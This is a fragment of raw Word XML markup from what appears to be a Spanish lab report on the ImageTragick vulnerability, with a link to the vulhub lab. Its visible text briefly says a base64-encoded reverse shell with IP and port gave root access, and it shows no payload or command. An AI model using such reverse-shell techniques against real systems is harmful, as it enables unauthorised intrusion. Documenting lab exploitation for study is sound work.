          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>revershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuramos parte del código utilizando base64 para colocar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y puertos y así obtuvimos finalmente el acceso a la maquina y con privilegios root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72483C6C" w14:textId="77777777" w:rsidR="009B7C68" w:rsidRDefault="009B7C68" w:rsidP="00A347CF"/>
    <w:p w14:paraId="42467C8D" w14:textId="65F7C120" w:rsidR="00A347CF" w:rsidRDefault="00A347CF" w:rsidP="00A347CF">
      <w:r>
        <w:t xml:space="preserve">Para </w:t>
      </w:r>
      <w:r w:rsidR="009B7C68">
        <w:t>más</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> información:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5349FA" w14:textId="6436B41A" w:rsidR="00A347CF" w:rsidRDefault="00A347CF" w:rsidP="00A347CF">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00F8748B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0457CA4C" w14:textId="77777777" w:rsidR="00A347CF" w:rsidRPr="00A347CF" w:rsidRDefault="00A347CF" w:rsidP="00A347CF"/>
    <w:sectPr w:rsidR="00A347CF" w:rsidRPr="00A347CF" w:rsidSect="007F25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201E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96E439D8"/>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368E352F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38AA3830"/>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5B8C4505"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="443C33E4"/>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79EB0D46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32FC5DCC"/>
    <w:lvl w:ilvl="0" w:tplc="0409000D">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"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num w:numId="1" w16cid:durableId="1424062892">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="373310164">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="842889626">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1715151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F1"/>
    <w:rsid w:val="004F0A5A"/>
    <w:rsid w:val="00537B34"/>
    <w:rsid w:val="005C6C98"/>
    <w:rsid w:val="00717A5A"/>
    <w:rsid w:val="00762751"/>
    <w:rsid w:val="007F2520"/>
    <w:rsid w:val="008013F1"/>
    <w:rsid w:val="008B15B2"/>
    <w:rsid w:val="008F5CED"/>
    <w:rsid w:val="009B7C68"/>
    <w:rsid w:val="00A347CF"/>
    <w:rsid w:val="00B635E2"/>
    <w:rsid w:val="00DD3978"/>
    <w:rsid w:val="00F71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023C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{89D1FC80-5B56-46B5-9E84-18654BBF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5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5CED"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A347CF"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A34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vulhub/vulhub/tree/master/imagemagick/imagetrag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760</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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-31T02:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-31T04:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>